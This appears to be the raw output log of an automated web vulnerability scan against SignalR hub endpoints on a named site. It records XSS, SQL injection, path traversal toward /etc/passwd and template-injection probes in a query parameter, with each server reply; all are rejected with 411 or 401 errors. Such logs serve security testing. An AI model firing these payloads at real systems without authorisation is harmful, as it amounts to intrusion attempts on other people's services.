175 lines
5.0 KiB
Plaintext
175 lines
5.0 KiB
Plaintext
=== PHASE 4: SIGNALR HUB INJECTION ===
|
|
|
|
--- Test: chatHub_xss (POST) ---
|
|
URL: https://www.realwave.com/chatHub/negotiate?uid=<script>alert(1)</script>&negotiateVersion=1
|
|
HTTP Code: 411
|
|
Response Headers:
|
|
HTTP/2 411
|
|
content-type: text/html; charset=us-ascii
|
|
server: Microsoft-HTTPAPI/2.0
|
|
date: Sat, 07 Feb 2026 05:45:44 GMT
|
|
content-length: 344
|
|
|
|
Response Body:
|
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
|
|
<HTML><HEAD><TITLE>Length Required</TITLE>
|
|
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
|
|
<BODY><h2>Length Required</h2>
|
|
<hr><p>HTTP Error 411. The request must be chunked or have a content length.</p>
|
|
</BODY></HTML>
|
|
|
|
[NOTE] Error/exception info in response
|
|
=========================================
|
|
|
|
--- Test: chatHub_sqli (POST) ---
|
|
URL: https://www.realwave.com/chatHub/negotiate?uid=1'+OR+'1'='1&negotiateVersion=1
|
|
HTTP Code: 411
|
|
Response Headers:
|
|
HTTP/2 411
|
|
content-type: text/html; charset=us-ascii
|
|
server: Microsoft-HTTPAPI/2.0
|
|
date: Sat, 07 Feb 2026 05:45:44 GMT
|
|
content-length: 344
|
|
|
|
Response Body:
|
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
|
|
<HTML><HEAD><TITLE>Length Required</TITLE>
|
|
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
|
|
<BODY><h2>Length Required</h2>
|
|
<hr><p>HTTP Error 411. The request must be chunked or have a content length.</p>
|
|
</BODY></HTML>
|
|
|
|
[NOTE] Error/exception info in response
|
|
=========================================
|
|
|
|
--- Test: uiHub_lfi (POST) ---
|
|
URL: https://www.realwave.com/uiHub/negotiate?uid=../../etc/passwd&negotiateVersion=1
|
|
HTTP Code: 411
|
|
Response Headers:
|
|
HTTP/2 411
|
|
content-type: text/html; charset=us-ascii
|
|
server: Microsoft-HTTPAPI/2.0
|
|
date: Sat, 07 Feb 2026 05:45:45 GMT
|
|
content-length: 344
|
|
|
|
Response Body:
|
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
|
|
<HTML><HEAD><TITLE>Length Required</TITLE>
|
|
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
|
|
<BODY><h2>Length Required</h2>
|
|
<hr><p>HTTP Error 411. The request must be chunked or have a content length.</p>
|
|
</BODY></HTML>
|
|
|
|
[NOTE] Error/exception info in response
|
|
=========================================
|
|
|
|
--- Test: chatHub_ssti (POST) ---
|
|
URL: https://www.realwave.com/chatHub/negotiate?uid=%7B%7B7*7%7D%7D&negotiateVersion=1
|
|
HTTP Code: 411
|
|
Response Headers:
|
|
HTTP/2 411
|
|
content-type: text/html; charset=us-ascii
|
|
server: Microsoft-HTTPAPI/2.0
|
|
date: Sat, 07 Feb 2026 05:45:45 GMT
|
|
content-length: 344
|
|
|
|
Response Body:
|
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
|
|
<HTML><HEAD><TITLE>Length Required</TITLE>
|
|
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
|
|
<BODY><h2>Length Required</h2>
|
|
<hr><p>HTTP Error 411. The request must be chunked or have a content length.</p>
|
|
</BODY></HTML>
|
|
|
|
[NOTE] Error/exception info in response
|
|
=========================================
|
|
|
|
--- Test: uiHub_xss (POST) ---
|
|
URL: https://www.realwave.com/uiHub/negotiate?uid=<img+src=x+onerror=alert(1)>&negotiateVersion=1
|
|
HTTP Code: 411
|
|
Response Headers:
|
|
HTTP/2 411
|
|
content-type: text/html; charset=us-ascii
|
|
server: Microsoft-HTTPAPI/2.0
|
|
date: Sat, 07 Feb 2026 05:45:45 GMT
|
|
content-length: 344
|
|
|
|
Response Body:
|
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
|
|
<HTML><HEAD><TITLE>Length Required</TITLE>
|
|
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
|
|
<BODY><h2>Length Required</h2>
|
|
<hr><p>HTTP Error 411. The request must be chunked or have a content length.</p>
|
|
</BODY></HTML>
|
|
|
|
[NOTE] Error/exception info in response
|
|
=========================================
|
|
|
|
=== RETRY WITH CONTENT-LENGTH ===
|
|
|
|
--- chatHub with payload: <script>alert(1)</script> ---
|
|
HTTP Code: 401
|
|
HTTP/2 401
|
|
server: Microsoft-IIS/10.0
|
|
x-powered-by: ASP.NET
|
|
date: Sat, 07 Feb 2026 05:45:53 GMT
|
|
|
|
Body:
|
|
|
|
=========================================
|
|
|
|
--- chatHub with payload: 1'+OR+'1'='1 ---
|
|
HTTP Code: 401
|
|
HTTP/2 401
|
|
server: Microsoft-IIS/10.0
|
|
x-powered-by: ASP.NET
|
|
date: Sat, 07 Feb 2026 05:45:53 GMT
|
|
|
|
Body:
|
|
|
|
=========================================
|
|
|
|
--- chatHub with payload: ../../etc/passwd ---
|
|
HTTP Code: 401
|
|
HTTP/2 401
|
|
server: Microsoft-IIS/10.0
|
|
x-powered-by: ASP.NET
|
|
date: Sat, 07 Feb 2026 05:45:54 GMT
|
|
|
|
Body:
|
|
|
|
=========================================
|
|
|
|
--- uiHub with payload: <script>alert(1)</script> ---
|
|
HTTP Code: 401
|
|
HTTP/2 401
|
|
server: Microsoft-IIS/10.0
|
|
x-powered-by: ASP.NET
|
|
date: Sat, 07 Feb 2026 05:45:56 GMT
|
|
|
|
Body:
|
|
|
|
=========================================
|
|
|
|
--- uiHub with payload: 1'+OR+'1'='1 ---
|
|
HTTP Code: 401
|
|
HTTP/2 401
|
|
server: Microsoft-IIS/10.0
|
|
x-powered-by: ASP.NET
|
|
date: Sat, 07 Feb 2026 05:45:56 GMT
|
|
|
|
Body:
|
|
|
|
=========================================
|
|
|
|
--- uiHub with payload: ../../etc/passwd ---
|
|
HTTP Code: 401
|
|
HTTP/2 401
|
|
server: Microsoft-IIS/10.0
|
|
x-powered-by: ASP.NET
|
|
date: Sat, 07 Feb 2026 05:45:57 GMT
|
|
|
|
Body:
|
|
|
|
=========================================
|